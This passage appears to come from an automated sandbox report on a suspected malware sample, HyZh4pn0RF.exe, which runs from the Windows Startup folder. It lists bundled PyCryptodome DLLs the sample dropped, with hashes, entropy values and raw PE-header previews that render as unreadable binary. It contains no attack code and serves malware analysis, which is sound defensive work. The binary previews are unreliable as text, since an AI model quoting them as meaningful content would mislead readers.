Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K,..B..B..B..R...B..UC..B.RC..B..C..B..UG..B..UF..B..UA..B..J..B..B..B....B..@..B.Rich.B.........................PE..d....e.........." ...%..... ......P.....................................................`..........................................9......x:..d....`.......P...............p..,....3...............................1..@............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_des.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57856
Entropy (8bit):	4.260220483695234
Encrypted:	false
SSDEEP:	384:9XUqVT1dZ/GHkJnYcZiGKdZHDLtiduprZNZY0JAIg+v:99HGHfJidSK
MD5:	0B538205388FDD99A043EE3AFAA074E4
SHA1:	E0DD9306F1DBE78F7F45A94834783E7E886EB70F
SHA-256:	C4769D3E6EB2A2FECB5DEC602D45D3E785C63BB96297268E3ED069CC4A019B1A
SHA-512:	2F4109E42DB7BC72EB50BCCC21EB200095312EA00763A255A38A4E35A77C04607E1DB7BB69A11E1D80532767B20BAA4860C05F52F32BF1C81FE61A7ECCEB35ED
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d....e.........." ...%.8...................................................0............`.....................................................d...............l............ ..4...................................@...@............P...............................text....7.......8.................. ..`.rdata..f....P.......<..............@..@.data...8...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_des3.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	58368
Entropy (8bit):	4.276870967324261
Encrypted:	false
SSDEEP:	384:9jUqho9weF5/eHkRnYcZiGKdZHDL7idErZjZYXGg:9RCneH//id42
MD5:	6C3E976AB9F47825A5BD9F73E8DBA74E
SHA1:	4C6EB447FE8F195CF7F4B594CE7EAF928F52B23A
SHA-256:	238CDB6B8FB611DB4626E6D202E125E2C174C8F73AE8A3273B45A0FC18DEA70C
SHA-512:	B19516F00CC0484D9CDA82A482BBFE41635CDBBE19C13F1E63F033C9A68DD36798C44F04D6BD8BAE6523A845E852D81ACADD0D5DD86AF62CC9D081B803F8DF7B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........................................................K......K......Ki.....K.....Rich...........................PE..d....e.........." ...%.:...................................................0............`.................................................P...d............................ ..4...................................@...@............P...............................text...x9.......:.................. ..`.rdata.......P.......>..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ecb.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	4.578113904149635
Encrypted:	false
SSDEEP:	96:R0qVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EpmFWLOXDwo2Pj15XkcX6gbW6z:DVddiT7pgTctEEI4qXDo11kcqgbW6
MD5:	FEE13D4FB947835DBB62ACA7EAFF44EF
SHA1:	7CC088AB68F90C563D1FE22D5E3C3F9E414EFC04
SHA-256:	3E0D07BBF93E0748B42B1C2550F48F0D81597486038C22548224584AE178A543
SHA-512:	DEA92F935BC710DF6866E89CC6EB5B53FC7ADF0F14F3D381B89D7869590A1B0B1F98F347664F7A19C6078E7AA3EB0F773FFCB711CC4275D0ECD54030D6CF5CB2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................p'......((..P....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_eksblowfish.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	6.143719741413071
Encrypted:	false
SSDEEP:	384:IUv5cRUtPQtjLJiKMjNrDF6pJgLa0Mp8Q90gYP2lXCM:BKR8I+K0lDFQgLa17zU
MD5:	76F88D89643B0E622263AF676A65A8B4
SHA1:	93A365060E98890E06D5C2D61EFBAD12F5D02E06
SHA-256:	605C86145B3018A5E751C6D61FD0F85CF4A9EBF2AD1F3009A4E68CF9F1A63E49
SHA-512:	979B97AAC01633C46C048010FA886EBB09CFDB5520E415F698616987AE850FD342A4210A8DC0FAC1E059599F253565862892171403F5E4F83754D02D2EF3F366
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.(...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text...X'.......(.................. ..`.rdata..T....@... ...,..............@..@.data...8....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..4............T..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ocb.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	17920
Entropy (8bit):	5.353267174592179
Encrypted:	false
SSDEEP:	384:7PHNP3Mj7Be/yB/6sB3yxcb+IMcOYqQViCBD8bg6Vf4A:hPcnB8KSsB34cb+bcOYpMCBDX
MD5:	D48BFFA1AF800F6969CFB356D3F75AA6
SHA1:	2A0D8968D74EBC879A17045EFE86C7FB5C54AEE6
SHA-256:	4AA5E9CE7A76B301766D3ECBB06D2E42C2F09D0743605A91BF83069FEFE3A4DE
SHA-512:	30D14AD8C68B043CC49EAFB460B69E83A15900CB68B4E0CBB379FF5BA260194965EF300EB715308E7211A743FF07FA7F8779E174368DCAA7F704E43068CC4858
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.(... ......P.....................................................`..........................................I.......J..d....p.......`..................,....C...............................A..@............@...............................text....'.......(.................. ..`.rdata..8....@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ofb.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.741247880746506
Encrypted:	false
SSDEEP:	192:0F/1nb2mhQtkgU7L9D037tfcqgYvEJPb:u2f6L9DSJxgYvEJj
MD5:	4D9182783EF19411EBD9F1F864A2EF2F
SHA1:	DDC9F878B88E7B51B5F68A3F99A0857E362B0361
SHA-256:	C9F4C5FFCDD4F8814F8C07CE532A164AB699AE8CDE737DF02D6ECD7B5DD52DBD
SHA-512:	8F983984F0594C2CAC447E9D75B86D6EC08ED1C789958AFA835B0D1239FD4D7EBE16408D080E7FCE17C379954609A93FC730B11BE6F4A024E7D13D042B27F185
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_BLAKE2b.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14848
Entropy (8bit):	5.212941287344097
Encrypted:	false
SSDEEP:	192:2F/1nb2mhQtkRySMfJ2ycxFzShJD9bAal2QDeJKcqgQx2QY:M2fKRQB2j8JD2fJagQx2QY
MD5:	F4EDB3207E27D5F1ACBBB45AAFCB6D02
SHA1:	8EAB478CA441B8AD7130881B16E5FAD0B119D3F0
SHA-256:	3274F49BE39A996C5E5D27376F46A1039B6333665BB88AF1CA6D37550FA27B29
SHA-512:	7BDEBF9829CB26C010FCE1C69E7580191084BCDA3E2847581D0238AF1CAA87E68D44B052424FDC447434D971BB481047F8F2DA1B1DEF6B18684E79E63C6FBDC5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%..... ......P.....................................................`..........................................9......\|:..d....`.......P..@............p..,....3...............................2..@............0...............................text...X........................... ..`.rdata.......0....... ..............@..@.data...8....@.......0..............@....pdata..@....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_BLAKE2s.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	5.181291194389683
Encrypted:	false
SSDEEP:	192:hF/1nb2mhQt7fSOp/CJPvADQHKtxSOvbcqgEvcM+:N2fNKOZWPIDnxVlgEvL
MD5:	9D28433EA8FFBFE0C2870FEDA025F519
SHA1:	4CC5CF74114D67934D346BB39CA76F01F7ACC3E2
SHA-256:	FC296145AE46A11C472F99C5BE317E77C840C2430FBB955CE3F913408A046284
SHA-512:	66B4D00100D4143EA72A3F603FB193AFA6FD4EFB5A74D0D17A206B5EF825E4CC5AF175F5FB5C40C022BDE676BA7A83087CB95C9F57E701CA4E7F0A2FCE76E599
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%..... ......P.....................................................`.........................................09.......9..d....`.......P..@............p..,....3...............................2..@............0...............................text...8........................... ..`.rdata..4....0......................@..@.data...8....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..,....p.......6..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_MD2.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	5.140195114409974
Encrypted:	false
SSDEEP:	192:RsiHXqpo0cUp8XnUp8XjEQnlDtJI6rcqgcx2:f6DcUp8XUp8AclDA69gcx2
MD5:	8A92EE2B0D15FFDCBEB7F275154E9286
SHA1:	FA9214C8BBF76A00777DFE177398B5F52C3D972D
SHA-256:	8326AE6AD197B5586222AFA581DF5FE0220A86A875A5E116CB3828E785FBF5C2
SHA-512:	7BA71C37AAF6CB10FC5C595D957EB2846032543626DE740B50D7CB954FF910DCF7CEAA56EB161BAB9CC1F663BADA6CA71973E6570BAC7D6DA4D4CC9ED7C6C3DA
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%..... ......P.....................................................`..........................................9......0:..d....`.......P..(............p..,....4...............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..,....p.......6..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_MD4.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.203867759982304
Encrypted:	false
SSDEEP:	192:WsiHXqpwUiv6wPf+4WVrd1DFrCqwWwcqgfvE:s6biio2Pd1DFmlgfvE
MD5:	FE16E1D12CF400448E1BE3FCF2D7BB46
SHA1:	81D9F7A2C6540F17E11EFE3920481919965461BA
SHA-256:	ADE1735800D9E82B787482CCDB0FBFBA949E1751C2005DCAE43B0C9046FE096F
SHA-512:	A0463FF822796A6C6FF3ACEBC4C5F7BA28E7A81E06A3C3E46A0882F536D656D3F8BAF6FB748008E27F255FE0F61E85257626010543FC8A45A1E380206E48F07C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%............P.....................................................`.........................................p8...... 9..d....`.......P..(............p..,...@3...............................2..@............0...............................text...X........................... ..`.rdata..p....0......................@..@.data...p....@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_MD5.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.478301937972917
Encrypted:	false
SSDEEP:	192:hZ9WXA7M93g8U7soSchhiLdjM5J6ECTGmDZkRsP0rcqgjPrvE:8Q0gH7zSccA5J6ECTGmDua89gjPrvE
MD5:	34EBB5D4A90B5A39C5E1D87F61AE96CB
SHA1:	25EE80CC1E647209F658AEBA5841F11F86F23C4E
SHA-256:	4FC70CB9280E414855DA2C7E0573096404031987C24CF60822854EAA3757C593
SHA-512:	82E27044FD53A7309ABAECA06C077A43EB075ADF1EF0898609F3D9F42396E0A1FA4FFD5A64D944705BBC1B1EBB8C2055D8A420807693CC5B70E88AB292DF81B7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%. ..........P.....................................................`..........................................8.......9..d....`.......P..X............p..,....3...............................1..@............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......2..............@....pdata..X....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_RIPEMD160.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18432
Entropy (8bit):	5.69608744353984
Encrypted:	false
SSDEEP:	384:nkP5RjF7GsIyV6Lx41NVYaVmtShQRKAa8+DSngkov:onx7RI26LuuHKz8+DbN
MD5:	42C2F4F520BA48779BD9D4B33CD586B9
SHA1:	9A1D6FFA30DCA5CE6D70EAC5014739E21A99F6D8
SHA-256:	2C6867E88C5D3A83D62692D24F29624063FCE57F600483BAD6A84684FF22F035
SHA-512:	1F0C18E1829A5BAE4A40C92BA7F8422D5FE8DBE582F7193ACEC4556B4E0593C898956065F398ACB34014542FCB3365DC6D4DA9CE15CB7C292C8A2F55FB48BB2B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.... ......P.....................................................`..........................................I.......J..d....p.......`..................,....D..............................PC..@............@...............................text....)......................... ..`.rdata.......@......................@..@.data...8....P.......>..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc..,............F..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA1.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	5.7981108922569735
Encrypted:	false
SSDEEP:	384:qPHNP3MjevhSY/8EBbVxcJ0ihTLdFDuPHgj+kf4D:sPcKvr/jUJ0sbDGAj+t
MD5:	AB0BCB36419EA87D827E770A080364F6
SHA1:	6D398F48338FB017AACD00AE188606EB9E99E830
SHA-256:	A927548ABEA335E6BCB4A9EE0A949749C9E4AA8F8AAD481CF63E3AC99B25A725
SHA-512:	3580FB949ACEE709836C36688457908C43860E68A36D3410F3FA9E17C6A66C1CDD7C081102468E4E92E5F42A0A802470E8F4D376DAA4ED7126818538E0BD0BC4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.0..........P.....................................................`..........................................H.......I..d....p.......`..X...............,....C...............................A..@............@...............................text..../.......0.................. ..`.rdata.......@.......4..............@..@.data........P.......B..............@....pdata..X....`.......D..............@..@.rsrc........p.......H..............@..@.reloc..,............J..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA224.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.865452719694432
Encrypted:	false
SSDEEP:	384:y1jwGPJHLvzcY1EEerju9LcTZ6RO3RouLKtcyDNOcwgjxo:QjwyJUYToZwOLuzDNB1j
MD5:	C8FE3FF9C116DB211361FBB3EA092D33
SHA1:	180253462DD59C5132FBCCC8428DEA1980720D26
SHA-256:	25771E53CFECB5462C0D4F05F7CAE6A513A6843DB2D798D6937E39BA4B260765
SHA-512:	16826BF93C8FA33E0B5A2B088FB8852A2460E0A02D699922A39D8EB2A086E981B5ACA2B085F7A7DA21906017C81F4D196B425978A10F44402C5DB44B2BF4D00A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.8... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text....6.......8.................. ..`.rdata.......P.......<..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..,............T..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA256.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.867732744112887
Encrypted:	false
SSDEEP:	384:51jwGPJHLxzcY1EEerju9LcTZ6RO3RouLKtcyDNIegjxo:rjwyJOYToZwOLuzDNI7j
MD5:	A442EA85E6F9627501D947BE3C48A9DD
SHA1:	D2DEC6E1BE3B221E8D4910546AD84FE7C88A524D
SHA-256:	3DBCB4D0070BE355E0406E6B6C3E4CE58647F06E8650E1AB056E1D538B52B3D3
SHA-512:	850A00C7069FFDBA1EFE1324405DA747D7BD3BA5D4E724D08A2450B5A5F15A69A0D3EAF67CEF943F624D52A4E2159A9F7BDAEAFDC6C689EACEA9987414250F3B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.8... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text....6.......8.................. ..`.rdata.......P.......<..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..,............T..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA384.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27136
Entropy (8bit):	5.860044313282322
Encrypted:	false
SSDEEP:	384:xFDL3RqE3MjjQ95UnLa+1WT1aA7qHofg5JptfISH2mDDXfgjVx2:jDLh98jjRe+1WT1aAeIfMzxH2mDDIj
MD5:	59BA0E05BE85F48688316EE4936421EA
SHA1:	1198893F5916E42143C0B0F85872338E4BE2DA06
SHA-256:	C181F30332F87FEECBF930538E5BDBCA09089A2833E8A088C3B9F3304B864968
SHA-512:	D772042D35248D25DB70324476021FB4303EF8A0F61C66E7DED490735A1CC367C2A05D7A4B11A2A68D7C34427971F96FF7658D880E946C31C17008B769E3B12F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.J..."......P.....................................................`......................................... l.......m..d...............................,....e...............................d..@............`...............................text...hH.......J.................. ..`.rdata..X....`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_SHA512.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27136
Entropy (8bit):	5.917025846093607
Encrypted:	false
SSDEEP:	384:tFYLXRqEnMgj969GUnLa+1WT1aA7qHofg5JptfIS320DXwElrgjhig:PYLB9Mgj0e+1WT1aAeIfMzx320DXD+j
MD5:	8194D160FB215498A59F850DC5C9964C
SHA1:	D255E8CCBCE663EE5CFD3E1C35548D93BFBBFCC0
SHA-256:	55DEFCD528207D4006D54B656FD4798977BD1AAE6103D4D082A11E0EB6900B08
SHA-512:	969EEAA754519A58C352C24841852CF0E66C8A1ADBA9A50F6F659DC48C3000627503DDFB7522DA2DA48C301E439892DE9188BF94EEAF1AE211742E48204C5E42
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.J..."......P.....................................................`..........................................l.......m..d...............................,...@f...............................e..@............`...............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_ghash_clmul.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	4.999870226643325
Encrypted:	false
SSDEEP:	192:DzFRF/1nb2mhQtk4axusjfkgZhoYDQgRjcqgQvEty:DzFd2f64axnTTz5D1gQvEty
MD5:	C89BECC2BECD40934FE78FCC0D74D941
SHA1:	D04680DF546E2D8A86F60F022544DB181F409C50
SHA-256:	E5B6E58D6DA8DB36B0673539F0C65C80B071A925D2246C42C54E9FCDD8CA08E3
SHA-512:	715B3F69933841BAADC1C30D616DB34E6959FD9257D65E31C39CD08C53AFA5653B0E87B41DCC3C5E73E57387A1E7E72C0A668578BD42D5561F4105055F02993C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...b..b..b..R...b..Uc..b.Rc..b..c..b..Ug..b..Uf..b..Ua..b..j..b..b..b....b..`..b.Rich.b.................PE..d....e.........." ...%............P.....................................................`..........................................8......89..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_ghash_portable.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13312
Entropy (8bit):	5.025153056783597
Encrypted:	false
SSDEEP:	192:AF/1nb2mhQtks0iiNqdF4mtPjD02A5APYcqgYvEL2x:62f6fFA/4GjDFcgYvEL2x
MD5:	C4CC05D3132FDFB05089F42364FC74D2
SHA1:	DA7A1AE5D93839577BBD25952A1672C831BC4F29
SHA-256:	8F3D92DE840ABB5A46015A8FF618FF411C73009CBAA448AC268A5C619CF84721
SHA-512:	C597C70B7AF8E77BEEEBF10C32B34C37F25C741991581D67CF22E0778F262E463C0F64AA37F92FBC4415FE675673F3F92544E109E5032E488F185F1CFBC839FE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8......h9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_keccak.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	5.235115741550938
Encrypted:	false
SSDEEP:	192:XTRgffnRaNfBj9xih1LPK73jm6AXiN4rSRIh42gDhgvrjcqgCieT3WQ:XafgNpj9cHW3jqXeBRamDOZgCieT
MD5:	1E201DF4B4C8A8CD9DA1514C6C21D1C4
SHA1:	3DC8A9C20313AF189A3FFA51A2EAA1599586E1B2
SHA-256:	A428372185B72C90BE61AC45224133C4AF6AE6682C590B9A3968A757C0ABD6B4
SHA-512:	19232771D4EE3011938BA2A52FA8C32E00402055038B5EDF3DDB4C8691FA7AE751A1DC16766D777A41981B7C27B14E9C1AD6EBDA7FFE1B390205D0110546EE29
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%."... ......P.....................................................`.........................................`I......TJ..d....p.......`..p...............,....C...............................B..@............@...............................text...(!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......6..............@....pdata..p....`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_poly1305.pyd

Download File

